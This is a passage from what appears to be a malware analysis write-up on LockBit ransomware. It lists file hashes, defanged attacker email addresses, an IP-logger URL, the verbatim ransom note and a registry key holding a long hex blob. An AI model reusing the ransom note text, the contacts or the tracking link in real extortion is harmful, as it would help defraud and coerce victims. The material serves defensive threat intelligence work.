<div class="highlight"><pre><span></span><span class="n">Ricks75</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 70cb1a8cb4259b72b704e81349c2ad5ac60cd1254a810ef68757f8c9409e3ea6</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">1536</span><span class="p">:</span><span class="n">CS98Y9MUIaJw</span><span class="o">/</span><span class="n">yGU6H9ed2VEVNUmjolqVMqqU</span><span class="o">+</span><span class="n">hV2</span><span class="o">+</span><span class="mi">70</span><span class="n">mXxc</span><span class="p">:</span><span class="n">Cy8Y9uJVbHo4Ve</span><span class="o">+</span><span class="n">mjhVMqqD</span><span class="o">/</span><span class="n">P7Xx</span>
<span class="n">Ricks72</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">1536</span><span class="p">:</span><span class="o">+</span><span class="n">uBQrT1eLBBdU</span><span class="o">/</span><span class="mi">1</span><span class="n">GJj4UgvpedwwtVNUmrTF3MqqU</span><span class="o">+</span><span class="n">hV2xQie</span><span class="p">:</span><span class="o">+</span><span class="n">uBUwX0C4Vvs2wT</span><span class="o">+</span><span class="n">mr5MqqD</span><span class="o">/</span><span class="n">Fi</span>
</pre></div>
<h3>Associated Files</h3>
<div class="highlight"><pre><span></span><span class="n">Restore</span><span class="o">-</span><span class="n">My</span><span class="o">-</span><span class="n">Files</span><span class="p">.</span><span class="n">txt</span>
<span class="n">Test</span><span class="p">.</span><span class="n">txt</span> <span class="p">(</span><span class="k">found</span> <span class="k">on</span> <span class="n">a</span> <span class="n">victim</span><span class="err">'</span><span class="n">s</span> <span class="k">system</span><span class="p">,</span> <span class="mi">0</span> <span class="n">bytes</span> <span class="k">in</span> <span class="k">Size</span><span class="p">)</span>
<span class="n">Process</span> <span class="n">Hacker</span> <span class="mi">2</span> <span class="n">was</span> <span class="n">installed</span> <span class="k">by</span> <span class="n">the</span> <span class="n">intruders</span>
</pre></div>
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="n">goeila</span><span class="nv">@countermail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">gupzkz</span><span class="nv">@cock</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">li</span><span class="w"></span>
<span class="n">abcd</span><span class="o">-</span><span class="n">help</span><span class="nv">@countermail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">supportpc</span><span class="nv">@cock</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">li</span><span class="w"></span>
<span class="n">goodsupport</span><span class="nv">@cock</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">li</span><span class="w"></span>
<span class="n">goodmen</span><span class="nv">@countermail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">goodmen</span><span class="nv">@cock</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">li</span><span class="w"></span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">iplo</span><span class="p">[.]</span><span class="n">ru</span><span class="o">/</span><span class="mi">1</span><span class="n">LJjq7</span><span class="p">.</span><span class="n">txt</span> <span class="p">(</span><span class="mi">88</span><span class="p">.</span><span class="mi">99</span><span class="p">.</span><span class="mi">66</span><span class="p">[.]</span><span class="mi">31</span><span class="p">,</span> <span class="n">belongs</span> <span class="k">to</span> <span class="n">iplogger</span><span class="p">[.]</span><span class="n">org</span><span class="p">)</span>
</pre></div>
<h3>Ransomnote</h3>
<div class="highlight"><pre><span></span><span class="nv">All</span> <span class="nv">your</span> <span class="nv">important</span> <span class="nv">files</span> <span class="nv">are</span> <span class="nv">encrypted</span><span class="o">!</span>
<span class="nv">There</span> <span class="nv">is</span> <span class="nv">only</span> <span class="nv">one</span> <span class="nv">way</span> <span class="nv">to</span> <span class="nv">get</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">back</span>:
<span class="mi">1</span>. <span class="nv">Contact</span> <span class="nv">with</span> <span class="nv">us</span>
<span class="mi">2</span>. <span class="k">Send</span> <span class="nv">us</span> <span class="mi">1</span> <span class="nv">any</span> <span class="nv">encrypted</span> <span class="nv">your</span> <span class="nv">file</span> <span class="nv">and</span> <span class="nv">your</span> <span class="nv">personal</span> <span class="nv">key</span>
<span class="mi">3</span>. <span class="nv">We</span> <span class="nv">will</span> <span class="nv">decrypt</span> <span class="mi">1</span> <span class="nv">file</span> <span class="k">for</span> <span class="nv">test</span><span class="ss">(</span><span class="nv">maximum</span> <span class="nv">file</span> <span class="nv">size</span> <span class="o">-</span> <span class="mi">1</span> <span class="nv">MB</span><span class="ss">)</span>, <span class="nv">its</span> <span class="nv">guarantee</span> <span class="nv">what</span> <span class="nv">we</span> <span class="nv">can</span> <span class="nv">decrypt</span> <span class="nv">your</span> <span class="nv">files</span>
<span class="mi">4</span>. <span class="nv">Pay</span>
<span class="mi">5</span>. <span class="nv">We</span> <span class="k">send</span> <span class="k">for</span> <span class="nv">you</span> <span class="nv">decryptor</span> <span class="nv">software</span>
<span class="nv">We</span> <span class="nv">accept</span> <span class="nv">Bitcoin</span>
<span class="nv">Attention</span><span class="o">!</span>
<span class="k">Do</span> <span class="nv">not</span> <span class="nv">rename</span> <span class="nv">encrypted</span> <span class="nv">files</span>.
<span class="k">Do</span> <span class="nv">not</span> <span class="nv">try</span> <span class="nv">to</span> <span class="nv">decrypt</span> <span class="nv">using</span> <span class="nv">third</span> <span class="nv">party</span> <span class="nv">software</span>, <span class="nv">it</span> <span class="nv">may</span> <span class="nv">cause</span> <span class="nv">permanent</span> <span class="nv">data</span> <span class="nv">loss</span>.
<span class="nv">Decryption</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">with</span> <span class="nv">the</span> <span class="nv">help</span> <span class="nv">of</span> <span class="nv">third</span> <span class="nv">parties</span> <span class="nv">may</span> <span class="nv">cause</span> <span class="nv">increased</span> <span class="nv">price</span><span class="ss">(</span><span class="nv">they</span> <span class="nv">add</span> <span class="nv">their</span> <span class="nv">fee</span> <span class="nv">to</span> <span class="nv">our</span><span class="ss">)</span>
<span class="nv">Contact</span> <span class="nv">information</span>: <span class="nv">abcd</span><span class="o">-</span><span class="nv">help</span>@<span class="nv">countermail</span>[.]<span class="nv">com</span>
<span class="nv">Be</span> <span class="nv">sure</span> <span class="nv">to</span> <span class="nv">duplicate</span> <span class="nv">your</span> <span class="nv">message</span> <span class="nv">on</span> <span class="nv">the</span> <span class="nv">e</span><span class="o">-</span><span class="nv">mail</span>: <span class="nv">supportpc</span>@<span class="nv">cock</span>[.]<span class="nv">li</span>
<span class="nv">Your</span> <span class="nv">personal</span> <span class="nv">id</span>:
[<span class="nv">Redacted</span>]
</pre></div>
<h3>Registry Keys</h3>
<p>A regshot dump can be found <a href="https://dissectingmalwa.re/other/lockbit-regshot.txt">here</a></p>
<div class="highlight"><pre><span></span><span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">LockBit</span><span class="err">\</span><span class="k">full</span><span class="p">:</span> [hex-encoded victim ID, omitted]
<span class="mi">07</span> <span class="mi">23</span> <span class="n">F4</span> <span class="mi">1</span><span class="n">B</span> <span class="n">CC</span> <span class="n">CD</span> <span class="mi">88</span> <span class="n">F8</span> <span class="mi">79</span> <span class="mi">63</span> <span class="mi">65</span> <span class="mi">66</span> <span class="mi">65</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">76</span> <span class="n">F0</span> <span class="n">DB</span> <span class="n">F9</span> <span class="n">A8</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">46</span> <span class="mi">9</span><span class="n">E</span> <span class="mi">8</span><span class="n">D</span> <span class="mi">96</span> <span class="mi">40</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">24</span> <span class="mi">1</span><span class="n">F</span> <span class="n">B5</span> <span class="mi">4</span><span class="n">B</span> <span class="n">C3</span> <span class="n">CC</span> <span class="mi">08</span> <span class="mi">81</span> <span class="mi">92</span> <span class="n">C5</span> <span class="n">F7</span> <span class="mi">57</span> <span class="n">B4</span> <span class="mi">4</span><span class="k">C</span> <span class="n">E2</span> <span class="mi">70</span> <span class="mi">3</span><span class="k">C</span> <span class="n">FD</span> <span class="mi">1</span><span class="n">E</span> <span class="mi">1</span><span class="n">E</span> <span class="n">C1</span> <span class="mi">24</span> <span class="n">D0</span> <span class="mi">03</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">60</span> <span class="n">C8</span> <span class="mi">13</span> <span class="n">C8</span> <span class="n">F2</span> <span class="mi">12</span> <span class="mi">34</span> <span class="mi">66</span> <span class="n">B6</span> <span class="mi">2</span><span class="n">A</span> 
<span class="mi">8</span><span class="n">F</span> <span class="n">BE</span> <span class="n">AD</span> <span class="mi">94</span> <span class="n">E0</span> <span class="mi">42</span> <span class="n">C0</span> <span class="mi">1</span><span class="n">D</span> <span class="n">C0</span> <span class="n">AE</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">12</span> <span class="n">F7</span> <span class="mi">57</span> <span class="n">AB</span> <span class="n">FA</span> <span class="n">C6</span> <span class="mi">65</span> <span class="n">F8</span> <span class="mi">3</span><span class="n">E</span> <span class="mi">68</span> <span class="n">BB</span> <span class="n">AD</span> <span class="mi">33</span> <span class="mi">7</span><span class="k">C</span> <span class="mi">0</span><span class="n">E</span> <span class="n">A7</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">04</span> <span class="mi">9</span><span class="n">E</span> <span class="mi">1</span><span class="k">C</span> <span class="n">ED</span> <span class="n">BF</span> <span class="n">F3</span> <span class="n">D6</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">03</span> <span class="mi">8</span><span class="n">E</span> <span class="n">B1</span> <span class="mi">75</span> <span class="mi">1</span><span class="n">A</span> <span class="n">BF</span> <span class="mi">11</span> <span class="n">D2</span> <span class="mi">8</span><span class="k">C</span> <span class="n">E6</span> <span class="mi">05</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">23</span> <span class="n">C7</span> <span class="n">AA</span> <span class="mi">15</span> <span class="n">C6</span> <span class="n">A4</span> <span class="mi">07</span> <span class="mi">04</span> <span class="n">DE</span> <span class="mi">6</span><span class="k">C</span> <span class="mi">0</span><span class="n">F</span> <span class="mi">9</span><span class="n">F</span> <span 
class="mi">06</span> <span class="mi">0</span><span class="n">E</span> <span class="mi">7</span><span class="k">C</span> <span class="n">AF</span> <span class="n">C0</span> <span class="mi">22</span> <span class="mi">53</span> <span class="n">E6</span> <span class="n">E6</span> <span class="mi">41</span> <span class="n">EA</span> <span class="n">A0</span> <span class="mi">4</span><span class="n">D</span> <span class="n">F0</span> <span class="mi">65</span> <span class="n">C7</span> <span class="mi">3</span><span class="n">B</span> <span class="mi">04</span> <span class="mi">1</span><span class="n">E</span> <span class="mi">79</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">50</span> <span class="mi">75</span> <span class="mi">35</span> <span class="n">F6</span> <span class="n">BE</span> <span class="n">C1</span> <span class="mi">6</span><span class="n">E</span> <span class="n">C0</span> <span class="mi">91</span> <span class="mi">2</span><span class="k">C</span> <span class="n">D4</span> <span class="n">B7</span> <span class="mi">59</span> <span class="mi">7</span><span class="n">D</span> <span class="n">D9</span> <span class="mi">2</span><span class="n">E</span> <span class="mi">46</span> <span class="n">FE</span> <span class="n">B2</span> <span class="mi">3</span><span class="n">E</span> <span class="n">B0</span> <span class="mi">28</span> <span class="mi">3</span><span class="n">A</span> <span class="mi">08</span> <span class="mi">95</span> <span class="mi">28</span> <span class="mi">99</span> <span class="mi">56</span> <span class="n">CC</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">14</span> <span class="n">A2</span> <span class="n">A4</span> <span class="mi">05</span> <span class="mi">69</span> <span class="n">EF</span> <span class="mi">34</span> <span class="mi">6</span><span class="n">B</span> <span class="n">F0</span> <span class="mi">99</span> <span 
class="mi">1</span><span class="n">F</span> <span class="mi">4</span><span class="n">A</span> <span class="mi">4</span><span class="k">C</span> <span class="n">E5</span> <span class="n">D0</span> <span class="mi">98</span> <span class="mi">31</span> <span class="n">C8</span> <span class="n">AB</span> <span class="n">AF</span> <span class="n">B3</span> <span class="mi">9</span><span class="n">F</span> <span class="mi">89</span> <span class="n">CD</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">8</span><span class="n">D</span> <span class="mi">23</span> <span class="n">F8</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">28</span> <span class="mi">7</span><span class="n">A</span> <span class="n">FF</span> <span class="mi">07</span> <span class="mi">49</span> <span class="n">AC</span> <span class="mi">97</span> <span class="mi">7</span><span class="k">C</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">3</span><span class="n">A</span> <span class="n">AA</span> <span class="mi">7</span><span class="n">F</span> <span class="n">EA</span> <span class="mi">36</span> <span class="mi">30</span> <span class="n">B4</span> <span class="mi">98</span> <span class="mi">7</span><span class="k">C</span> <span class="mi">94</span> <span class="mi">5</span><span class="n">A</span> <span class="n">BD</span> <span class="n">A6</span> <span class="mi">28</span> <span class="mi">2</span><span class="k">C</span> <span class="mi">70</span> <span class="mi">10</span> <span class="n">BA</span> <span class="mi">09</span> <span class="mi">89</span> <span class="n">AD</span> <span class="mi">35</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">90</span> <span class="n">F0</span> <span class="mi">54</span> <span class="mi">2</span><span class="n">E</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">7</span><span class="n">A</span> <span class="n">AB</span> <span 
class="mi">1</span><span class="n">F</span> <span class="mi">09</span> <span class="mi">59</span> <span class="mi">4</span><span class="n">B</span> <span class="mi">35</span> <span class="n">E4</span> <span class="n">FB</span> <span class="mi">8</span><span class="n">E</span> <span class="mi">86</span> <span class="n">B0</span> <span class="n">D8</span> <span class="mi">6</span><span class="n">D</span> <span class="n">D6</span> <span class="n">A8</span> <span class="n">EA</span> <span class="mi">12</span> <span class="mi">3</span><span class="n">A</span> <span class="n">CB</span> <span class="n">D0</span> <span class="n">A1</span> <span class="n">B2</span> <span class="mi">1</span><span class="n">D</span> <span class="n">C4</span> <span class="mi">4</span><span class="n">F</span> <span class="n">C9</span> <span class="mi">99</span> <span class="n">CE</span> <span class="mi">9</span><span class="n">A</span> <span class="mi">42</span> <span class="n">EC</span> <span class="mi">34</span> <span class="n">DB</span> <span class="n">B9</span> <span class="n">AA</span> <span class="mi">10</span> <span class="mi">7</span><span class="n">E</span> <span class="mi">87</span> <span class="mi">89</span> <span class="n">FC</span> <span class="mi">70</span> <span class="n">FE</span> <span class="n">A3</span> <span class="mi">2</span><span class="n">B</span> <span class="mi">1</span><span class="n">E</span> <span class="n">FD</span> <span class="mi">5</span><span class="n">D</span> <span class="mi">95</span> <span class="n">E4</span> <span class="mi">57</span> <span class="n">EC</span> <span class="n">AA</span> <span class="mi">86</span> <span class="n">F8</span> <span class="n">B8</span> <span class="mi">63</span> <span class="mi">0</span><span class="n">D</span> <span class="n">A0</span> <span class="n">FE</span> <span class="n">C6</span> <span class="mi">88</span> <span class="mi">20</span> <span class="n">A1</span> <span class="n">AD</span> <span class="mi">2</span><span 
class="n">B</span> <span class="mi">12</span> <span class="mi">7</span><span class="n">D</span> <span class="mi">52</span> <span class="mi">67</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">0</span><span class="n">A</span> <span class="n">FA</span> <span class="mi">42</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">99</span> <span class="n">CC</span> <span class="mi">46</span> <span class="n">F9</span> <span class="mi">44</span> <span class="n">DB</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">1</span><span class="n">B</span> <span class="n">A8</span> <span class="n">E6</span> <span class="mi">01</span> <span class="n">D2</span> <span class="n">D9</span> <span class="mi">1</span><span class="n">E</span> <span class="n">E2</span> <span class="n">C7</span> <span class="n">B6</span> <span class="mi">49</span>
<span class="mi">7</span><span class="n">F</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">7</span><span class="n">E</span> <span class="mi">84</span> <span class="mi">34</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">76</span> <span class="mi">0</span><span class="n">F</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">0</span><span class="n">A</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">16</span> <span class="n">AA</span> <span class="n">D0</span> <span class="n">C5</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">22</span> <span class="mi">12</span> <span class="mi">44</span> <span class="mi">73</span> <span class="n">A7</span> <span class="mi">87</span> <span class="mi">16</span> <span class="mi">4</span><span class="n">B</span> <span class="n">DC</span> <span class="mi">5</span><span class="n">B</span> <span class="n">B3</span> <span class="n">CB</span> <span class="n">D3</span> <span class="n">CD</span> <span class="mi">07</span> <span class="mi">4</span><span class="n">D</span> <span class="mi">66</span> <span class="mi">6</span><span class="n">F</span> <span class="mi">83</span> <span class="mi">08</span> <span class="n">B4</span> <span class="mi">13</span> <span class="mi">20</span> <span class="n">BF</span> <span class="mi">96</span> <span class="n">AB</span> <span class="n">B1</span> <span class="mi">64</span> <span class="mi">45</span> <span class="mi">43</span> <span class="n">EE</span> <span class="mi">10</span> <span class="mi">8</span><span class="n">A</span> <span class="n">F2</span> <span class="n">F8</span> <span class="mi">33</span> <span class="n">A9</span> <span class="mi">08</span> <span class="n">C0</span> <span class="n">D9</span> <span class="n">ED</span> <span class="mi">23</span> <span class="mi">7</span><span class="n">E</span> <span class="n">C3</span> <span class="mi">91</span> <span class="mi">02</span> 
<span class="n">D3</span> <span class="mi">21</span> <span class="n">B3</span> <span class="mi">70</span> <span class="n">B1</span> <span class="mi">82</span> <span class="n">ED</span> <span class="mi">42</span> <span class="mi">8</span><span class="n">E</span> <span class="mi">12</span> <span class="mi">83</span> <span class="mi">14</span> <span class="n">B2</span> <span class="mi">93</span> <span class="n">F8</span> <span class="mi">67</span> <span class="n">B9</span> <span class="mi">0</span><span class="n">D</span> <span class="n">AB</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">6</span><span class="n">E</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">35</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">72</span> <span class="mi">3</span><span class="k">C</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">57</span> <span class="mi">2</span><span class="k">C</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">57</span> <span class="mi">68</span> <span class="n">BF</span> <span class="mi">93</span> <span class="mi">37</span> <span class="mi">92</span> <span class="mi">7</span><span class="n">B</span> <span class="n">D3</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">52</span> <span class="n">F0</span> <span class="mi">76</span> <span class="mi">36</span> <span class="mi">22</span> <span class="mi">29</span> <span class="n">AF</span> <span class="n">F5</span> <span class="mi">74</span> <span class="n">F0</span> <span class="mi">12</span> <span class="n">E0</span> <span class="mi">7</span><span class="k">C</span> <span class="mi">8</span><span class="n">B</span> <span class="n">A8</span> <span class="n">B6</span> <span class="n">BE</span> <span class="mi">59</span> <span class="n">F0</span> <span class="n">F3</span> <span class="mi">07</span> <span class="n">D8</span> 
<span class="n">EA</span> <span class="mi">67</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">47</span> <span class="mi">35</span> <span class="n">A6</span> <span class="n">B8</span> <span class="mi">3</span><span class="n">B</span> <span class="mi">12</span> <span class="n">A4</span> <span class="n">BA</span> <span class="mi">99</span> <span class="mi">71</span> <span class="n">D6</span> <span class="mi">52</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">86</span> <span class="n">C9</span> <span class="mi">1</span><span class="n">F</span> <span class="n">C4</span> <span class="mi">89</span> <span class="n">AF</span> <span class="n">C6</span> <span class="mi">36</span> <span class="mi">8</span><span class="k">C</span> <span class="mi">40</span> <span class="n">FC</span> <span class="n">EC</span> <span class="n">C7</span> <span class="mi">0</span><span class="n">F</span> <span class="mi">44</span> <span class="mi">59</span> <span class="n">EE</span> <span class="mi">51</span> <span class="n">D1</span> <span class="mi">44</span> <span class="mi">94</span> <span class="n">AD</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">4</span><span class="n">E</span> <span class="n">AF</span> <span class="n">DC</span> <span class="mi">90</span> <span class="n">CB</span> <span class="mi">30</span> <span class="n">D8</span> <span class="mi">2</span><span class="n">B</span> <span class="mi">36</span> <span class="n">A5</span> <span class="n">DE</span> <span class="mi">03</span> <span class="n">A6</span> <span class="n">FA</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">37</span> <span class="mi">26</span> <span class="n">FD</span> <span class="mi">5</span><span class="n">D</span> <span class="mi">89</span> <span class="n">C9</span> <span class="mi">93</span> <span class="mi">8</span><span class="n">A</span> <span class="n">B3</span> 
<span class="n">C6</span> <span class="n">D6</span> <span class="n">E2</span> <span class="mi">59</span> <span class="mi">2</span><span class="n">F</span> <span class="n">B2</span> <span class="mi">32</span> <span class="mi">13</span> <span class="n">B4</span> <span class="n">DF</span> <span class="mi">97</span> <span class="mi">95</span> <span class="n">D9</span> <span class="n">FD</span> <span class="mi">75</span> <span class="n">B6</span> <span class="mi">6</span><span class="n">E</span> <span class="n">F1</span> <span class="mi">4</span><span class="n">F</span> <span class="n">CA</span> <span class="n">A0</span> <span class="mi">79</span> <span class="n">EA</span> <span class="mi">32</span> <span class="mi">39</span> <span class="n">C0</span> <span class="mi">71</span> <span class="mi">33</span> <span class="mi">85</span> <span class="mi">06</span> <span class="n">D0</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">68</span> <span class="n">E8</span> <span class="n">B4</span> <span class="n">C1</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">13</span> <span class="mi">94</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">6</span><span class="k">C</span> <span class="mi">90</span> <span class="n">A4</span> <span class="mi">96</span> <span class="n">F5</span> <span class="mi">5</span><span class="n">E</span> <span class="n">A8</span> <span class="mi">66</span> <span class="mi">30</span> <span class="mi">6</span><span class="n">E</span> <span class="n">D5</span> <span class="n">F4</span> <span class="n">CC</span> <span class="mi">50</span> <span class="mi">60</span> <span class="n">F1</span> <span class="n">DB</span> <span class="mi">7</span><span class="n">D</span> <span class="n">C3</span> <span class="mi">91</span> <span class="n">C9</span> <span class="mi">77</span> <span 
class="mi">1</span><span class="n">F</span> <span class="mi">96</span> <span class="n">BC</span> <span class="n">E4</span> <span class="mi">26</span> <span class="n">FE</span> <span class="mi">92</span> <span class="n">A2</span> <span class="n">F9</span> <span class="mi">83</span> <span class="mi">4</span><span class="n">D</span> <span class="mi">13</span> <span class="mi">00</span> <span class="mi">2</span><span class="n">D</span> <span class="n">AD</span> <span class="n">DF</span> <span class="mi">0</span><span class="n">A</span> <span class="n">F2</span> <span class="n">C3</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">81</span> <span class="n">A9</span> <span class="mi">18</span> <span class="n">B8</span> <span class="mi">85</span> <span class="mi">1</span><span class="n">A</span> <span class="n">F4</span> <span class="mi">71</span> <span class="mi">1</span><span class="n">E</span> <span class="n">F0</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">3</span><span class="n">E</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">4</span><span class="k">C</span> <span class="mi">10</span> <span class="n">C9</span> <span class="n">F5</span> <span class="n">A8</span> <span class="mi">29</span> <span class="n">A2</span> <span class="mi">26</span> <span class="n">F6</span> <span class="mi">5</span><span class="n">B</span> <span class="mi">2</span><span class="k">C</span> <span class="mi">60</span> <span class="n">F2</span> <span class="n">D0</span> <span class="mi">29</span> <span class="mi">48</span> <span class="mi">00</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">8</span><span class="n">D</span> <span class="n">FB</span> <span class="n">E4</span> <span class="mi">31</span> <span class="n">D8</span> <span class="n">C7</span> <span class="n">A9</span> <span class="n">CD</span> <span class="n">A9</span> <span class="mi">6</span><span class="n">A</span> <span 
class="n">A5</span> <span class="mi">16</span> <span class="n">EC</span> <span class="n">A8</span> <span class="mi">44</span> <span class="mi">18</span> <span class="mi">00</span> <span class="mi">5</span><span class="n">E</span> <span class="n">FD</span> <span class="n">A3</span> <span class="mi">0</span><span class="n">E</span> <span class="n">F1</span> <span class="mi">48</span> <span class="mi">86</span> <span class="mi">2</span><span class="k">C</span> <span class="n">B3</span> <span class="mi">48</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">39</span> <span class="mi">15</span> <span class="mi">0</span>
<span class="mi">8</span> <span class="mi">39</span> <span class="mi">54</span> <span class="mi">9</span><span class="n">E</span> <span class="mi">95</span> <span class="mi">24</span> <span class="n">CD</span> <span class="n">AE</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">3</span><span class="n">B</span> <span class="mi">3</span><span class="k">C</span> <span class="n">E9</span> <span class="n">F2</span> <span class="mi">3</span><span class="n">D</span> <span class="n">BF</span> <span class="mi">3</span><span class="n">E</span> <span class="mi">1</span><span class="n">E</span> <span class="mi">16</span> <span class="mi">52</span> <span class="n">C9</span> <span class="n">D8</span> <span class="n">B8</span> <span class="n">D9</span> <span class="n">DE</span> <span class="mi">5</span><span class="k">C</span> <span class="n">E5</span> <span class="mi">0</span><span class="n">A</span> <span class="mi">91</span> <span class="n">C3</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">98</span> <span class="n">DD</span> <span class="n">EC</span> <span class="mi">67</span> <span class="mi">65</span> <span class="mi">16</span> <span class="mi">71</span> <span class="mi">68</span> <span class="mi">51</span> <span class="mi">12</span> <span class="mi">89</span> <span class="n">F4</span> <span class="mi">5</span><span class="n">E</span> <span class="n">B9</span> <span class="mi">3</span><span class="n">A</span> <span class="mi">52</span> <span class="mi">10</span> <span class="mi">82</span> <span class="mi">37</span> <span class="mi">48</span> <span class="n">C7</span> <span class="n">B5</span> <span class="n">D0</span> <span class="n">FA</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">85</span> <span class="mi">2</span><span class="n">B</span> <span class="n">A1</span> <span class="mi">5</span><span class="n">E</span> <span class="n">C0</span> <span class="n">E3</span> <span class="mi">6</span><span 
class="n">D</span> <span class="n">D8</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">74</span> <span class="n">DE</span> <span class="n">B7</span> <span class="mi">03</span> <span class="n">FF</span> <span class="mi">94</span> <span class="mi">38</span> <span class="n">C7</span> <span class="n">A0</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">3</span><span class="n">B</span> <span class="n">E0</span> <span class="n">CE</span> <span class="n">F2</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">01</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">67</span> <span class="mi">82</span> <span class="n">BE</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">9</span><span class="n">D</span> <span class="mi">11</span> <span class="mi">99</span> <span class="mi">40</span> <span class="n">C3</span> <span class="mi">85</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">97</span> <span class="mi">74</span> <span class="n">B1</span> <span class="n">EB</span> <span class="mi">67</span> <span class="mi">16</span> <span class="mi">42</span> <span class="n">BB</span> <span class="n">FF</span> <span class="mi">25</span> <span class="mi">71</span> <span class="mi">09</span> <span class="mi">38</span> <span class="n">A1</span> <span class="mi">4</span><span class="n">E</span> <span class="n">E8</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">4</span><span class="n">D</span> <span class="n">F0</span> <span class="n">E8</span> <span class="mi">63</span> <span class="n">CA</span> <span class="n">EC</span> <span class="n">E1</span> <span class="mi">35</span> <span class="n">FF</span> <span class="mi">26</span> <span class="mi">08</span> <span class="n">DE</span> <span class="n">A9</span> <span class="n">A5</span> <span class="mi">70</span> <span class="mi">29</span> <span class="mi">57</span> <span class="n">D1</span> 
<span class="mi">4</span><span class="n">A</span> <span class="mi">04</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">5</span><span class="n">F</span> <span class="n">CE</span> <span class="mi">36</span> <span class="mi">83</span> <span class="mi">4</span><span class="n">B</span> <span class="mi">21</span> <span class="mi">3</span><span class="k">C</span> <span class="n">D4</span> <span class="n">CE</span> <span class="mi">01</span> <span class="n">D0</span> <span class="mi">83</span> <span class="n">EF</span> <span class="n">EC</span> <span class="n">D0</span> <span class="n">F5</span> <span class="mi">26</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">47</span> <span class="mi">68</span> <span class="mi">08</span> <span class="mi">3</span><span class="k">C</span> <span class="mi">46</span> <span class="n">D1</span> <span class="mi">74</span> <span class="n">E6</span> <span class="n">E3</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">8</span><span class="n">B</span> <span class="n">FB</span> <span class="mi">73</span> <span class="n">E2</span> <span class="n">C4</span> <span class="n">D9</span> <span class="n">C6</span> <span class="n">E0</span> <span class="mi">24</span> <span class="mi">67</span> <span class="mi">0</span><span class="n">D</span> <span class="mi">62</span> <span class="mi">44</span> <span class="mi">79</span> <span class="mi">70</span> <span class="mi">92</span> <span class="n">C3</span> <span class="n">AB</span> <span class="mi">96</span> <span class="mi">00</span> <span class="mi">8</span><span class="n">E</span> <span class="n">E6</span> <span class="mi">68</span> <span class="mi">33</span> <span class="mi">9</span><span class="n">D</span> <span class="mi">7</span><span class="k">C</span> <span class="n">C2</span> <span class="mi">83</span> <span class="n">AB</span> <span class="mi">77</span> <span class="n">B2</span> 